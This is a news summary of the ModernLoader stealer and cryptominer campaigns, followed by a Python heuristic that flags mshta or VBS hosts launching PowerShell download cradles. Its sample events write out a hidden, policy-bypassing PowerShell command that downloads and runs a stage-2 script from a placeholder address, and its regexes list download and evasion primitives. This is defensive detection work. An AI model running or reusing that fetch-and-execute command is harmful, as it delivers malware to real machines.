"Hackers Use ModernLoader to Infect Systems with Stealers and Cryptominers"

Between March and June 2022, three different but related campaigns were discovered delivering ModernLoader, RedLine Stealer, and cryptocurrency miners onto compromised systems. According to Cisco Talos researcher Vanja Svajcer, the actors use PowerShell, .NET assemblies, HTML Application (HTA), and Visual Basic Script (VBS) files to spread across a targeted network, dropping other pieces of malware, such as the SystemBC Trojan and DCRat, to enable various stages of their operations. ModernLoader, the malicious implant in question, is designed to give attackers remote control over the victim's machine, allowing them to deploy additional malware, steal sensitive information, or enlist the computer in a botnet. Cisco Talos attributed the infections to a previously unknown, Russian-speaking threat actor, citing the use of commercially available tools. Users in Eastern European countries, including Bulgaria, Poland, Hungary, and Russia, were among the potential targets. Infection chains discovered by the cybersecurity firm include attempts to compromise vulnerable web applications such as WordPress and cPanel installations in order to distribute malware via files disguised as fake Amazon gift cards. The first-stage payload is an HTA file that executes a PowerShell script hosted on the command-and-control (C2) server to begin the deployment of interim payloads, which eventually inject the final malware using a technique known as process hollowing. ModernLoader, also known as Avatar bot, is described as a simple .NET Remote Access Trojan (RAT) with features to gather system information, execute arbitrary commands, or download and run a file from the C2 server, enabling the adversary to change its modules in real time. This article continues to discuss hackers' use of ModernLoader to infect victims' systems with stealers and cryptocurrency miners.
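One way a defender can hunt for the HTA-to-PowerShell stage described above is to look for a script host (mshta.exe, or wscript.exe/cscript.exe for the VBS variants) spawning powershell.exe with a download cradle and evasion flags on its command line. The detection heuristic below is an added example written for this page; it is not code from Cisco Talos, THN, or the ModernLoader campaign. The process-creation events it runs over are constructed, Sysmon-style records, and the file name, script host list, flag patterns, and 203.0.113.10 address are assumptions chosen for illustration.

```python
"""Heuristic detection of a script host (HTA/VBS) launching a PowerShell
download cradle, as in the first-stage chain described on this page.
Added example; the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events (assumption: a victim opened a fake gift-card HTA).
SAMPLE_EVENTS = [
    ProcEvent(400, 100, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(501, 400, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\victim\Downloads\amazon_gift_card.hta"'),
    ProcEvent(502, 501,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.10/stage2.ps1')\""),
    # Benign: an admin-scheduled script launched from explorer, no cradle.
    ProcEvent(601, 400,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    # Benign: an HTA help file that never spawns PowerShell.
    ProcEvent(701, 400, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\help.hta"),
]

# Assumed script hosts worth treating as suspicious PowerShell parents.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Common PowerShell download/execute primitives (case-insensitive).
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression"
    r"|\biex\b|net\.webclient|start-bitstransfer)", re.IGNORECASE)

# Flags that hide the window or bypass policy/profile; typical of loaders.
EVASION_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop(rofile)?\b"
    r"|-enc(odedcommand)?\b)", re.IGNORECASE)

URL_PATTERN = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_hta_powershell_chain(events):
    """Return one finding per powershell.exe whose parent is a script host.

    Each finding lists which indicators fired so an analyst can triage by
    score; a bare script-host parent with no indicators still scores 0 and
    is reported, because that parent relationship alone is unusual.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue
        indicators = []
        if DOWNLOAD_CRADLE.search(e.cmdline):
            indicators.append("download-cradle")
        if EVASION_FLAGS.search(e.cmdline):
            indicators.append("hidden-or-bypass-flags")
        if ".hta" in parent.cmdline.lower():
            indicators.append("hta-argument")
        findings.append({
            "pid": e.pid,
            "parent": basename(parent.image),
            "indicators": indicators,
            "score": len(indicators),
            "urls": URL_PATTERN.findall(e.cmdline),
        })
    return findings


if __name__ == "__main__":
    for f in detect_hta_powershell_chain(SAMPLE_EVENTS):
        print(f"pid={f['pid']} parent={f['parent']} score={f['score']} "
              f"indicators={f['indicators']} urls={f['urls']}")
```

The parent-child check is what gives this rule its precision: PowerShell with a download cradle is noisy on its own in many environments, but PowerShell whose parent is mshta.exe or a VBS host is rarely legitimate, and the extracted URL gives an immediate pivot to the C2 host for blocking and retro-hunting.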

THN reports "Hackers Use ModernLoader to Infect Systems with Stealers and Cryptominers"
